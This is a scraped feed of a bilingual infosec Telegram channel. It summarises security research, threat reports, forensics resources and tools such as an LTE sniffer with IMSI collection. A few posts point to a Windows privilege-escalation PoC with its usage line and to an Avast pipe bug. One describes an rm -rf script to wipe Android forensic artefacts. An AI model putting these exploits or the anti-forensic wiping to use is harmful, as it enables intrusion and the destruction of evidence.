📕LTESniffer: An Open-source LTE Downlink/Uplink Eavesdropper#security #privacy #cellularCommunication #LTE #sniffer #networkAnalyis
2023-04-28 12:15:00
|LTESniffer|🛡Только в ознакомительных целях!📡Недавно мне на глаза попался довольно интересный сниффер беспроводных сообщений LTE "LTESniffer" (cell tower ака сотовая вышка или сота ↔️ смартфон) - нисходящая/восходящая линия связи и реализован поверх FALCON с использованием srsRAN библиотеки. Важно - LTESniffer не предназначен для дешифрования сообщений между сотой и смартфоном. Одним из применений, описанным автором, можно считать анализ заголовков на следующих уровнях: MAC и физический(это в том случае, если приходится анализировать зашифрованный трафик), то есть по сути он применяется для захвата и дальнейшего анализа не зашифрованных фрагментов связи между сотой и смартфоном.Принцип работы вкратце: 1️⃣Декодирование PDCCH(Physical Downlink Control Channel) для получения DCIs(Downlink Control Informations) и RNTIs(Radio Network Temporary Identifiers) всех пользователей.2️⃣Используя декодированные DCIS и RNTI из первого шага, LTESniffer дополнительно декодирует PDSCH(Physical Downlink Shared Channel) и PUSH(Physical Uplink Shared Channel ) для извлечения трафика данных восходящей и нисходящей линий связи. Описанный во-втором пункте момент с декодированием пакетов протокола в PDSCH и PUSCH отличается от большинства, если не от всех анализаторов ОПЕНСОУРСНЫХ(к примеру - Airscope), по сути позволяя перехватывать пакеты, связанные с приватностью в эфире.Также, что не мало важно, есть API безопасности LTE: RNTI-TMSI маппинг, сбор IMSI и профилирование UECapability.⬇️ Ниже прикладываю работу.⬇️🛡 For educational purposes only!📡Recently, I came across a rather interesting LTE wireless message sniffer "LTESniffer" (cell tower ↔️ smartphone) - a Downlink/Uplink and implemented on top of FALCON using the srsRAN library. Important - LTESniffer is not designed to decrypt messages between a cell and a smartphone. One of the applications described by the author can be considered header analysis at the following levels: MAC and physical (this is if you have to analyze encrypted traffic), that is, in fact, it is used to capture and further analyze unencrypted fragments of communication between a cell and a smartphone.The principle of operation in brief: 1️⃣Decoding PDCCH(Physical Downlink Control Channel) to get DCIs(Downlink Control Informations) and RNTIs(Radio Network Temporary Identifiers) all users.2️⃣Using decoded DCIS and RNTI from the first step, LTESniffer additionally decodes PDSCH(Physical Downlink Shared Channel) and PUSH(Physical Uplink Shared Channel ) to extract uplink and downlink data traffic. The moment described in the second paragraph with the decoding of protocol packets in PDSCH and PUSCH differs from most, if not all, OPEN-SOURCE analyzers (for example, Airscope), essentially allowing you to intercept packets related to privacy on the air.Also, not least, there is an LTE security API: RNTI-TMSI mapping, IMSI collection and UECapability profiling.⬇️I am applying the work below.⬇️#security #privacy #cellularCommunication #LTE #sniffer #networkAnalyis
2023-04-28 12:14:50
#security #privacy #cellularCommunication #LTE #sniffer #networkAnalyis Images Images Images
2023-04-28 08:47:52
|AppSec Ezine|📰480rd EditionRelease Date: 28/04/2023pathonprojectgithub#ezine #appsec #infosec Images
2023-04-27 14:27:50
📲Android Deep Link issues and WebView ExploitationAndroid Deep Linking and usage of WebViews in the Android applications are one of most targeted yet least talked about attack vectors. In this blog post, we will explore these issues in-depth and provide you with the techniques for exploiting and securing against such attacks.💥Try out your skills on the BuggyWebView application. Images Images Images Images
2023-04-21 16:10:10
📕A Security Analysis of Computer Numerical Control Machines in Industry 4.0
2023-04-21 15:03:22
📕Compromising Garmin's Sport Watches: A Deep Dive into GarminOS and its MonkeyC Virtual Machine
2023-04-21 13:51:50
📕SMART SPEAKER SHENANIGANS:MAKING THE SONOS ONE SING ITS SECRETS
2023-04-21 12:57:36
|AppSec Ezine|📰479rd EditionRelease Date: 21/04/2023pathonprojectgithub#ezine #appsec #infosec Images
2023-04-20 14:46:04
🗃Ваш покорный слуга скачал все доступные на данный момент презентации с Hack In The Box 2023 Amsterdam и укомплектовал в архив.🗃Your humble servant downloaded all currently available presentations from Hack In The Box 2023 Amsterdam and archived them.#HITB2023 #security #API #AV #Fingerprinting #Honeypots #PostExploitation #hacking #shellcode #iOS #windows #malware #bugs #WAN #LAN #AntiCensorship #obfuscation #virtuallization #XRP
2023-04-20 14:44:01
#HITB2023 #security #API #AV #Fingerprinting #Honeypots #PostExploitation #hacking #shellcode #iOS #windows #malware #bugs #WAN #LAN #AntiCensorship #obfuscation #virtuallization #XRP Images
2023-04-19 12:43:13
📕APT28 exploits known vulnerability to carry out reconnaissance and deploy malware on Cisco routers.Тут вышел небольшой совместный отчет от АНБ в партнерстве с НЦКВ(NCSC), ФБР и CISA о TTPs, связанных с эксплуатацией CVE-2017-6742(уязвимости в подсистеме SNMP Cisco, можно было аутентифицированному злоумышленнику добиться RCE или DoS) силами APT28. Если быть более точным, то атакующие "Медведи" маскировались под SNMP для эксплуатации CVE-2017-6742. Как указано в отчете, таргеты располагались по всему миру: правительственные учреждения США, около 250 украинских жертв и некоторое(довольно не большое) количество людей в Европе.В отчете также приводятся меры смягчения.#GCHQ #NCSC #CISA #FBI #NSA #APT28 #expoitation #Cisco #TTPs
2023-04-19 12:42:36
📕APT28 exploits known vulnerability to carry out reconnaissance and deploy malware on Cisco routers.Here came a small joint report from the NSA in partnership with the NCSC, the FBI and CISA on TTPs related to the exploitation of CVE-2017-6742 (vulns in the Cisco SNMP subsystem, an authenticated attacker could achieve RCE or DoS) by APT28. To be more precise, the attacking "Bears" masqueraded as SNMP to exploit CVE-2017-6742. As indicated in the report, the targets were located all over the world: US government agencies, about 250 Ukrainian victims and some (rather small) number of people in Europe.The report also provides mitigation measures.#GCHQ #NCSC #CISA #FBI #NSA #APT28 #expoitation #Cisco #TTPs Images Images Images Images Images
2023-04-18 14:56:24
💥1day link to the Private Shizo group.
2023-04-18 14:52:28
None Images Images Images Images Images Images Images Images Images
2023-04-18 14:48:52
🕵️‍♂️А вот и две цели атак, которые разрешили Citizen Lab назвать их реальные данные и их устройства были проанализированы форензик специалистами - Хорхе Сантьяго Агирре Эспиноса(директор Centro Prodh) и Мария Луиза Агилар Родригес(координатор международной зоны).🕵️‍♂️And here are the two targets of the attacks that allowed Citizen Lab to name their real data and their devices were analyzed by forensic specialists - Jorge Santiago Aguirre Espinosa (director of Centro Prodh) and María Luisa Aguilar Rodríguez (coordinator of the international zone).#CitizenLab #NGO #NSOGroup #PegasusSpyware #Apple #iOS #expoitation #forensics #investigation Images Images
2023-04-18 14:39:03
|Triple Threat|🕵️‍♂️Citizen Lab выпустили новый отчет "Triple Threat: NSO Group’s Pegasus Spyware Returns in 2022 with a Trio of iOS 15 and iOS 16 Zero-Click Exploit Chains" про три 0-click сплойт чейна для iOS 15 и iOS 16: FINDMYPWN, PWNYOURHOME и LATENTIMAGE, которые использовались для проламывания Мексиканцев(члены гражданского общества ака правозащитников Мексики) и доказательства указывают на использование Пегасуса от NSO Group. 🕵️‍♂️Citizen Lab has released a new report "Triple Threat: NSO Group’s Pegasus Spyware Returns in 2022 with a Trio of iOS 15 and iOS 16 Zero-Click Exploit Chains" about three 0-click exploit chains for iOS 15 and iOS 16: FINDMYPWN, PWNYOURHOME and LATENTIMAGE, which were used to break through Mexicans (members of civil society aka human rights defenders of Mexico) and evidence points to the use of Pegasus from the NSO Group.#CitizenLab #NSOGroup #PegasusSpyware #Apple #iOS #expoitation #forensics #investigation Images Images Images Images Images Images Images Images Images
2023-04-18 10:43:51
💥Series of blogposts: "Introduction to macOS" helping people transition to macOS infosec.💾Introduction to macOS - macOS App structure💾Introduction to macOS - Gatekeeper💾Introduction to macOS - the App sandbox💾Introduction to macOS - SIP Images
2023-04-18 10:34:49
|iOS Forensics References: a curated list|📲 Актуальность форензики яблочных смартфонов не падает и на помощь в этом непростом деле приходит аналогичный предыдущему списку, нацеленному на андроид-девайсы, только в данном случае для iOS-устройств. То есть, репозиторий содержит ссылки на статьи, исследовательские работы и сообщения на разных форумах/блогах про определенные директории/файлы и все это укомплектовано по папкам.📲The relevance of the forensiсs of Apple smartphones does not fall and a similar list aimed at Android devices, only in this case for iOS devices, comes to the rescue in this difficult matter. That is, the repository contains links to articles, research papers and posts on various forums/blogs about certain directories/files, and all this is completed by folders.#forensics #iOS Images Images Images Images
2023-04-16 20:41:12
None Images Images Images Images Images Images Images Images Images
2023-04-15 13:42:40
Уже старенькая, но в отличие вот от этого https://t.me/tvoijazz/2121 вполне себе эффективная программулина для скрытия любых файлов и папок во внутренней памяти устройства.Есть, конечно, более брутальные и надежные способы что-либо спрятать, но "на всякий случай" и для "обычного пользователя" вполне годится. Скрывает как папки целиком, так и отдельные файлы в выбранных директориях. Со съемным накопителем не работает. Данная версия модифицирована, не имеет выхода в сеть и не содержит трекеров. Более свежие версии грешны. Images Images
2023-04-15 13:41:45
Пока подготавливал девайсы, возник вопрос об удалении чувствительных данных. Речь идёт не о фоточках в кэше и прочему всем известному шлаку, а о действительно ценных данных для специалистов мобильной форензики. Очень много данных содержится вне директорий устанавливаемого ПО. Например, данные всех точек, к которым подключалось устройство или время, используемое в каждом приложении с указанием времени установки и прочей.Да, знаю, что есть специализированное ПО, которое подчищает ту же директорию /data в ноль, что почти равносильно вайпу системы. Но что если нам необходимо удалить только некоторые данные? Мы же не удаляем систему из-за того, что кто-то "случайно" посмотрел порно, а просто чистим кэш и историю :)Посему я взялся составлять список папок и файлов, которые мне необходимо подчистить без полного удаления системы. Прошу обратить внимание на данный репозиторий, где указаны практически все пути, которые могут быть интересны для извлечения данных.А далее скрипт в термуксе с rm -rf чувствительных мест и вуаля.З.Ы. я добавлял ещё кое какие системные вещи. Может быть потом поделюсь списком ;)
2023-04-15 13:39:33
|AppSec Ezine|📰478rd EditionRelease Date: 14/04/2023pathonprojectgithub#ezine #appsec #infosec Images
2023-04-15 13:37:50
|AppSec Ezine|📰477rd EditionRelease Date: 07/04/2023pathonprojectgithub#ezine #appsec #infosec Images
2023-04-15 13:35:17
📕Studies in Intelligence 67, No. 4#USA #USSR #Russia #Japan #Africa #Asia #CIA #KGB #Mossad #Spying #Intelligence #CounterIntelligence #WWII #Espionage
2023-04-15 13:34:46
|Studies in Intelligence 67, No. 4|🕵️‍♂️Вышел новый выпуск журнала для разведчиков: "Studies in Intelligence(Исследования в области Разведки)". Вкратце что за журнал можно почитать тут.📕Содержание журнала: 📑В память о бывшем офицере американской разведки DD/CIA(заместитель директора ЦРУ) - Вон Фредерик Бишоп(1946-2023)📑Разведка в Открытом море:Использование разведданных для противодействия незаконному, не сообщаемому и нерегулируемому рыболовству.📑Шпионы - хранители - Из архива:Морские операции береговой охраны США и OSS(Управление Cтратегических Cлужб) во время Второй мировой войны📑Контрразведка в общественных СМИ:Бывший офицер разведки реагирует на книгу Роберта Баера "Четвертый человек: охота на шпиона КГБ на вершине ЦРУ и возвышение Путинской России"📑Мемуары генерального прокурора:Обзорное эссе: Одна чертовщина за другой, Мемуары Уильяма П. Барра📑Обзорное эссе: Перспективы Японской разведки и проблемы национальной безопасности Шпионаж через "Темное Стекло": этика шпионажа и контрразведки📑Случайный Царь: жизнь и ложь Владимира Путина📑Российская “гибридная война”: возрождение и политизация📑Понимание новых прокси-войн: поля сражений и стратегии, меняющие облик Большого Ближнего Востока📑"Белая Злоба": ЦРУ и тайная реколонизация Африки📑От развития к демократии: трансформация современной Азии📑Нужно знать: Вторая Мировая Война и расцвет американской разведки📑Захват Эйхмана: мемуары шпиона Моссада📑Книжная полка офицера разведки - март 2023 года🕵️‍♂️A new issue of the magazine for intelligence officers has been published: "Studies in Intelligence ". In short, what kind of magazine can you read here.📕Contents of the magazine:📑In memory of the former American intelligence officer DD/CIA (Deputy Director of the CIA) - Vaughn Frederick Bishop (1946-2023)📑Intelligence on the High Seas:Using Intelligence to Counter Illegal, Unreported, and Unregulated Fishing📑Guardian Spies - From the Archive: The US Coast Guard and OSS Maritime Operations During World War II📑Counterintelligence in Public Media:Former Intelligence Officer Responds to The Fourth Man📑Memoir of an Attorney General:Review Essay: One Damn Thing After Another, William P. Barr’s Memoir📑Review Essay: Perspectives on Japan’s Intelligence and National Security Challenges📑Spying Through a Glass Darkly: The Ethics of Espionage and Counter-Intelligence📑Accidental Czar: The Life and Lies of Vladimir Putin📑Russian “Hybrid Warfare”: Resurgence and Politicization📑Understanding the New Proxy Wars: Battlegrounds and Strategies Reshaping the Greater Middle East📑White Malice: The CIA and the Covert Recolonization of Africa📑From Development to Democracy: The Transformation of Modern Asia📑Need to Know: World War II and the Rise of American Intelligence📑Capturing Eichmann: The Memoir of a Mossad Spymaster📑Intelligence Officer’s Bookshelf - March 2023#USA #USSR #Russia #Japan #Africa #Asia #CIA #KGB #Mossad #Spying #Intelligence #CounterIntelligence #WWII #Espionage
2023-04-15 13:33:53
#USA #USSR #Russia #Japan #Africa #Asia #CIA #KGB #Mossad #Spying #Intelligence #CounterIntelligence #WWII #Espionage Images Images Images Images
2023-03-31 12:57:00
|AppSec Ezine|📰476rd EditionRelease Date: 31/03/2023pathonprojectgithub#ezine #appsec #infosec Images
2023-03-31 09:32:29
None
2023-03-29 00:53:00
🔓SHA-1 gets SHAtteredThe implication of SHA-1 collisions being practical (not simply theoretical) is that if any of the four example application types (digital signature schemes, message authentication co des, password hashing, and content-addressable storage) were using SHA-1, they would all be vulnerable to attackers who could obtain colliding signatures, codes, passwords, or files respectively. However, since SHA-1 usage has significantly decreased in the last few years (especially since 2017), it may seem that this post is somewhat redundant. However, as time goes on all hash functions may become vulnerable to collision attacks - not only SHA-1. Therefore, as computational time decreases and power increases, the analyses and principles described above are relevant to hash functions that are (at the time of writing) considered more secure. Images
2023-03-29 00:45:18
|AppSec Ezine|📰475rd EditionRelease Date: 24/03/2023pathonprojectgithub#ezine #appsec #infosec Images
2023-03-29 00:41:22
🧅Timeless Timing Attacks and Preload Defenses in Tor's DNS CacheРабота про timeless timing атаку на DNS-кэш Tor'а, которая дает возможность атакующему удостовериться путем отправки одной TLS-записи, кэширован домен или нет. По сути кэшированные домены часто не приводят к попаданию в кэш, однако атакующий может проверить в дальнейшем по причине остаточной функции оных. В работе можно ознакомиться как с двумя краткосрочными смягчающими решениями, так и с долгосрочным решением по редизайну, подразумевающему предварительную загрузку только списка разрешенных доменов, который всегда кэшируется по цепям(circuits).#Tor #privacy #TimelessTimingAttack #SCA #DNScache #TLS
2023-03-29 00:40:13
🧅Timeless Timing Attacks and Preload Defenses in Tor's DNS CacheThe work is about a timeless timing attack on Tor's DNS cache, which allows the attacker to verify by sending a single TLS record whether the domain is cached or not. In fact, cached domains often do not lead to getting into the cache, but an attacker can check in the future because of the residual function of these. In the work, you can get acquainted with both two short-term mitigation solutions, and a long-term solution with a redesign that implies preloading only the list of allowed domains, which is always cached by circuits.#Tor #privacy #TimelessTimingAttack #SCA #DNScache #TLS Images Images Images Images Images
2023-03-10 08:48:50
Google меня почитывает?Здесь я говорил про дыру в captive portal https://t.me/tvoijazz/2027, в Android 13 (AOSP) отключение данной приблуды вынесли в отдельную функцию (см. скрин 1)Тут я говорил о защите от скриншотов https://t.me/tvoijazz/1747, в Android 14 это обещают реализовать средствами самой системы (см. скрин 2).Шутки шутками, но на самом деле это хорошо что в Android на уровне системы вносятся реально полезные в плане безопасности данных изменения, а не одни только свистоперделки типа Emoji Lab. Когда-нибудь наступит день... Да не, вряд ли. Images Images
2023-03-08 19:57:58
🔥🔥🔥CVE-2023-21768(Windows Ancillary Function Driver for WinSock EoP) PoC exploit.Complete exploit works on vulnerable Windows 11 22H2 systems. Write primitive works on all vulnerable systems.Usage:Windows_AFD_LPE_CVE-2023-21768.exe <pid>
2023-03-08 19:57:57
None
2023-03-08 19:55:30
🔓A Vulnerability in Implementations of SHA-3, SHAKE, EdDSA, and Other NIST-Approved Algorithm.💥SHA-3 Buffer Overflow(CVE-2022-37454, the Keccak XKCP SHA-3 reference implementation before fdc6fef has an integer overflow and resultant BoF that allows attackers to execute arbitrary code or eliminate expected cryptographic properties).#vulnerability #cryptography #expoitation #HashFunctions #SHA3 #SHAKE #EdDSA #Windows #Linux #macOS #x86_64
2023-03-08 19:55:19
#vulnerability #cryptography #expoitation #HashFunctions #SHA3 #SHAKE #EdDSA #Windows #Linux #macOS #x86_64 Images Images Images Images
2023-03-08 19:34:55
None Images Images Images
2023-03-08 17:20:59
Небольшой вне плановый пост про передачу данных с air gap с использованием модуляции яркости экрана🎥📺Версия на русскомA small off-schedule post about air gap data transfer using screen brightness modulation🎥📺English version#air_gap #camera #wireless_hacking #light
2023-03-08 17:10:21
❤️Happy International women's day!
2023-03-07 09:50:36
🗺Osmin is a GPS navigator On-Road/Off-Road for Android device.Strongly inspired by osmscout by Karry, it uses a fork of libosmscout as backend. It includes features such as generic compass, tracker, GPX reader/writer, road router, POI database.💥Releases.
2023-03-07 09:49:16
Относительно новый игрок среди опенсорсных навигаторов.Неплохая детализация, он(оф)лайн построение маршрутов, голосовое сопровождение, в том числе и на русском языке. Работает шустро, серьезных косяков не наблюдаю.Из минусов - нет разбивки офлайн карт по регионам. Чтобы навигировать по относительно небольшому городу где-нибудь в Мухосрани, в отличие от тех же Organic Maps, приходится закачивать всю Рашан Федерашан, а это, на минуточку, 4+ Гб живого места на накопителе.
2023-03-03 18:38:40
🕵️‍♂️An OS-agnostic Approach to Memory Forensics"In this paper we introduce the new concept of emph{OS-agnostic memory forensics}, which is based on techniques that can recover certain forensics information without emph{any} knowledge of the internals of the underlying OS. Our approach allows to automatically identify different types of data structures by using only their topological constraints and then supports two modes of investigation. In the first, it allows to traverse the recovered structures by starting from predetermined textit{seeds}, i.e., pieces of forensics-relevant information (such as a process name or an IP address) that an analyst knows emph{a priori} or that can be easily identified in the dump."#DFIR #forensics #volatileMemory #artifacts #OSagnostic
2023-03-03 18:38:20
#DFIR #forensics #volatileMemory #artifacts #OSagnostic Images Images Images
2023-03-03 13:36:47
📡Drone Security and the Mysterious Case of DJI’s DroneID Свежая работа про поверхность атаки DJI-дронов, разбор обсуждаемого неоднократно (НЕ)безопасного дизайна протокола DJI DroneID(отключение, перехвати и подделывание оного, из последних - "DJI drone IDs…
2023-03-03 12:40:53
🔥🔥🔥Hardware investigation of wireless keyloggersHardware keyloggers can be bought online for a couple of dollars and are very appreciated due to their discretion because they cannot be discovered by endpoint security software. The only condition for attackers is the usage of an external keyboard. We can assume they are used for espionage, while no public communication exists for such usage apart from a few articles. They can be bought on many websites, even Amazon, making them commonly used in private life, for example during a divorce. Many vendors also highlight their usage for monitoring employees. These vendors also sell other kind of recording devices, such as video (recording VGA, HDMI or DVI), RS232 and even Ethernet loggers. For all these tools, the price varies according to storage capacity and features (time keeping, Wi-Fi access...). Additionally, backdoored keyboards or small PCBs to insert in existing ones can also easily be bought online. Images Images Images Images
2023-03-03 11:46:48
|AppSec Ezine|📰472rd EditionRelease Date: 03/03/2023pathonprojectgithub#ezine #appsec #infosec Images
2023-03-03 01:01:36
🔥🔥🔥sudo: double free with per-command chroot sudoers rules(CVE-2023-27320)A flaw exists in sudo's per-command chroot feature that could result in the variable that stores the command being freed more than once. The vulnerability lies in a memory leak when specifying a chroot directory in the sudoers file, and has NO impact on default configurations.💥The vulnerability can be triggered only when a sudoers rule is configured to grant sudo privileges to a user and only when CHROOT is set for this rule, which is rare.🛡Security fix in this commit: 87ce69246869d9b9d69be278e29e0fc6a3cabdb9 "Fix potential double free for rules that include a CHROOT= option".🛡To mitigate this if you're affected by a vulnerable configuration, remove from the sudoers file the rules containing a CHROOT.⚠️The issue only affects Sudo versions 1.9.8-1.9.13p1 Images
2023-03-03 00:28:58
🛡National Cybersecurity Strategy(March 2023).#WhiteHouse #strategy #security #privacy #threats #CriticalInfrastructure #CICS #cryptography #vulnerabilities
2023-03-03 00:27:48
|National Cybersecutiry Strategy march23|🛡Белый Дом опубликовал информационный бюллетень "2023 National Cybersecurity Strategy", направленный на отображения видения и подхода по обеспечению безопасного цифрового будущего жителей США. Описанная в бюллетене стратегия устранения угроз(государственные и негосударственные субъекты разрабатывают и проводят новые компании, угрожающие национальной безопасности, общественной безопасности и экономическому процветанию) путем построения и сотрудничества по следующим направлениям:1️⃣Защита КИИ - для обеспечения доступности и устойчивости оной и услуг, которые она предлагает.2️⃣Разрушение(подрыв) и устранение субъектов угрозы - завязывание рук злоумышленникам(ака кибер преступники) для понижение угроз национальной/общественной безопасности США. 3️⃣Формирование рыночной силы(чему стоило бы точно нашим поучиться) для обеспечения безопасности и устойчивости - направлено на снижение рисков и перенесение последствий плохой кибербезопасности с наиболее уязвимых на более надежные, дабы в дальнейшем укрепить цифровую экосистему.4️⃣Инвестирование в устойчивое будущее - для поддержания лидирующих позиций США в области инноваций в безопасности и устойчивых технологий инфраструктуры следующего поколения будут продолжаться стратегические инвестиции и скоординированные совместные действия.5️⃣Налаживание международных партнерских отношений для достижения общих целей(укрепление государства в киберпространстве и все участвующие в данном процессе и ведущие себя безответственно, должны быть изолированы и и понимать цену данным действиям).⚠️Советую ознакомиться полностью с данным бюллетенем или хотя бы пробежаться по интересующим пунктам более подробно, ведь не мало моментов применимы не только в США. 🛡The White House has published the newsletter "2023 National Cybersecurity Strategy", aimed at displaying a vision and approach to ensure a secure digital future for US residents. The strategy described in the bulletin to eliminate threats (state and non-state actors develop and conduct new companies that threaten national security, public safety and economic prosperity) by building and cooperating in the following areas:1️⃣Protection of Critical Infrastructure - to ensure the availability and sustainability of it and the services it offers.2️⃣Destruction (undermining) and dismantle of threat actors - tying the hands of intruders (aka cyber criminals) to reduce threats to the national/public security of the United States. 3️⃣The formation of market power (which our people should definitely learn) to drive security and resilience is aimed at reducing risks and transferring the consequences of poor cybersecurity from the most vulnerable to more reliable ones in order to further strengthen the digital ecosystem.4️⃣IInvesting in a resilience future - Strategic investments and coordinated joint actions will continue to maintain the leading position of the United States in the field of security innovation and sustainable next-generation infrastructure technologies.5️⃣Establishing international partnerships to achieve shared goals (strengthening the state in cyberspace and all those involved in this process and behaving irresponsibly should be isolatedand understand the price of these actions).⚠️I advise you to read this bulletin in full or at least run through the points of interest in more detail, because not a few points are applicable not only in the USA.#WhiteHouse #strategy #security #privacy #threats #CriticalInfrastructure #CICS #cryptography #vulnerabilities
2023-03-03 00:27:38
#WhiteHouse #strategy #security #privacy #threats #CriticalInfrastructure #CICS #cryptography #vulnerabilities Images Images Images Images
2023-03-02 19:14:52
📕CrowdStrike 2023 Global Threat Report.#security #ThreatIntelligence #Espionage #Cloud #ICS #vulnerabilities #expoitation #InitialAccess #lateralMovement #defenseEvasion #LPE #EoP #malware #SocialEngineering #DarkWeb #AccessBrokers
2023-03-02 19:14:27
None Images Images Images Images
2023-03-02 15:11:41
🛡АВ - это безопасно говорили они. Без АВ тебя легко взломать - говорили они. А как по итогу, уже скопилось множество багов в АВ/EDR и техник эксплуатации, за счет чего при наличии оных, лишь увеличивается поверхность атак конечной системы. На сей раз - Avast с его динамической либой JsFlt.dl, которая инжектится в процесс браузера и открывает пайп с именем "\\.\pipe\chrome.PID.1.971151191159711010098111120112105112101", где соответственно PID - процесса браузера. По сути в браузере(Chromium-based) не блокируется загрузка aswJsFlt.dll, порождающая этот пайп(за счет перехвата wildcard NtCreateFile и NtOpenFile тут, пайп в таком случае доступен запесоченного рендера, хотя про ограничение перехвата пайпа есть уже issue). Так а в чем тут проблема? aswJsFlt.dll имеет поток, ожидающий данный пайп и при выполнении вредоносного кода в изолированном процессе, направленного на запись в пайп, можно добиться UAF или double free, то есть по сути в коде, отвечающем за ожидание пайпа в потоке(aswJsFlt.dll) есть UAF бага.🔖Код и инструкции о том, как затригерить багу(PoC), прикладываю ниже, а почитать сам issue 1378357 "Avast aswJsFlt.dll 18.0.1479.0 exposes vulnerable pipe endpoint to renderers" тут.
2023-03-01 20:04:51
|Decider|🕵️‍♂️Данный инструмент нацелен на помощь в выборе тактики, техники или подтехники атакующего в сопоставлении с MITRE ATT&CK фреймворком и он является по сути дополнением к руководству "Best Practices for MITRE ATT&CK Mapping" от CISA" и идет вместе с информационным бюллетенем о инструменте и видео . То есть нередко бывает дилемма с нанесением на карту той или иной техники, используемой атакующим, и Decider как раз помогает в данном случае. Причем, перед конечным результатом специалисту выстраивается ряд наводящих/управляемых вопросов(на человеческом языке) непосредственно о активности/действиях атакующего. Помимо всего прочего есть фильтрация, поиск(мы можем в таком случае не распыляться на не особо связанные с нашим инцидентом части ATT&CK) и экспорт итогового результата в таблицы или экземпляр ATT&CK Navigator.Если кого интересует, то Decider состоит из трех компонентов: PostgreSQL, веб-сервер(uWSGI) и собственно самого инструмента.🕵️‍♂️ This tool is aimed at helping to choose tactics, techniques or sub-techniques of the attacker in comparison with the MITRE ATT&CK Framework and it is essentially an addition to the manual "Best Practices for MITRE ATT&CK Mapping" from CISA" and comes along with a fact sheet about the tool and a video. That is, there is often a dilemma with mapping a particular technique used by an attacker, and Decider just helps in this case. Moreover, before the final result, the specialist is lined up with a number of suggestive / controlled questions (in human language) directly about the activity / actions of the attacker. Among other things, there is filtering, searching (in this case, we can not be sprayed on parts of ATT&CK that are not particularly related to our incident) and exporting the final result to tables or an instance of ATT&CK Navigator.If anyone is interested, then Decider consists of three components: PostgreSQL, a web server (uWSGI) and the tool itself.#DFIR #CISA #HSSEDI #ATTandCK #mapping #tactics
2023-03-01 20:04:44
#DFIR #CISA #HSSEDI #ATTandCK #mapping #tactics Images
2023-03-01 17:43:43
🔥🔥🔥Действительно серьезная бага была обнаружена в AMD Zen2, в результате которой(после переключения контекста после инструкции ucomiss) происходит "roll back"(откат) YMM - регистров к предыдущим значениям после переключения контекста. В случае, если есть подходящий процессор, то можно повторить шаги по инструкциями из сообщения про эту багу "x86: AMD Zen2 ymm registers rolling back".Как возможное решение/смягчение в линуксе - отключение XSAVES на затронутых процах и если прям хочется сейчас, то можно пожертвовать производительностью и загрузиться с помощью clearcpuid=xsaves.⚠️Важно учитывать тот факт, что значения между процессами не текут, но еще важнее, что уязвимые модели не получили микрокод, закрывающий данную багу.#securityFlaw #bug #AMD #Zen2 #Ryzen #expoitation #microcode #leak Images
2023-02-28 16:41:36
Привет, мои Чеширские котики🐱Я доделала пост про мобильную криминалистику🔎В начале там будут приведены методы мобильной форензики.После я проведу пример анализа криптокошельков на андроиде и айфоне.А в конце будет приведены инструменты упрощающее процесс расследования.Так же материал дополняющий статью будет в архиве ниже.Русская версияHello, my Cheshire cats🐱I finished the post about mobile forensics🔎In the beginning there will be mobile forensics methods.After that I will give an example of cryptocurrency analysis on android and iPhone.And at the end there will be tools to simplify the investigation process.Also the material supplementing the article will be in the archive below.English version#crypto_wallet #bitcoin #nft #android #forensics #ios
2023-02-28 16:26:51
#cryptography #cryptanalysis #AES #WhiteBox #DCA #DFA #FaultsInject
2023-02-28 16:26:35
|Dark Phoenix|🔓Еще один интересный проект(посмотреть другие с атаками по побочному каналу(SCA) "Side-Channel Marvels" тут) для выполнения differential fault analysis(DFA) атак white-box имплементаций AES с внешними кодировками от кварков. Реализация очень близка к той, которая описывается в работе "A DFA Attack on White-Box Implementations of AES with External Encodings". Стоит отметить основной момент в сравнении с классическим DFA: заместо взлома AES-ключа с использованием всего лишь с использованием двух ошибок(прям идеальные условия и луна в правильной позиции), то в данном случае необходимо воспользоваться более чем миллионом(ахтунг!) ошибок. Однако стоит заметить, что в случае white-box настройки не считается какой-то огромной цифрой и в статье демонстрируется атака, занимающая всего лишь 2 минуты, что довольно неплохо.Более подробно в статье: "Dark Phoenix: a new White-box Cryptanalysis Open Source Tool " от кварков.🔖Репозиторий с исходным кодом находится тут.⚠️Инструмент предназначен только для 8-битной кодировки!🔓Another interesting project (see others with Side-Channel attacks(SCA)"Side-Channel Marvels" here) to perform differential fault analysis(DFA) attacks of white-box AES implementations with external encodings from quarks. The implementation is very close to the one described in the work "A DFA Attack on White-Box Implementations of AES with External Encodings". It is worth noting the main point in comparison with the classic DFA: instead of hacking the AES key using only two faults (just ideal conditions and the moon in the right position), then in this case it is necessary to use more than a million (ahtung!) faults. However, it is worth noting that in the case of a white-box, the settings are not considered some huge figure and the article demonstrates an attack that takes only 2 minutes, which is pretty good.For more details, see the article: "Dark Phoenix: a new White-box Cryptanalysis Open Source Tool " from quarks.🔖The source code repository is located here.⚠️The tool is designed for 8-bit encoding only!#cryptography #cryptanalysis #AES #WhiteBox #DCA #DFA #FaultsInject
2023-02-28 16:26:25
#cryptography #cryptanalysis #AES #WhiteBox #DCA #DFA #FaultsInject Images
2023-02-27 07:55:49
📡Paralyzing Drones via EMI Signal Injection on Sensory Communication ChannelsIn this paper, Joonha Jang (KAIST), ManGi Cho (KAIST), Jaehoon Kim (KAIST), Dongkwan Kim (KAIST) and Yongdae Kim (KAIST) propose a novel anti-drone technique that effectively corrupts ANY IMU sensor data regardless of the sensor’s type, model, and manufacturer. Our key idea is to distort the communication channel between the IMU and control unit of a drone by using an electromagnetic interference (EMI) signal injection. Experimentally, for a given control unit board, regardless of the sensor used, we discovered a distinct susceptible frequency at which an EMI signal can greatly distort the sensor data. Compared to a general EM pulse (EMP) attack, it requires much less power as it targets the specific susceptible frequency. It can also avoid collateral damage from the EMP attack. For practical evaluation, we demonstrate the feasibility of the attack using real drones; the attack instantly paralyzed the drones.
2023-02-26 01:41:34
#security #anonymity #deanonymization #P2P #Tox
2023-02-26 01:33:41
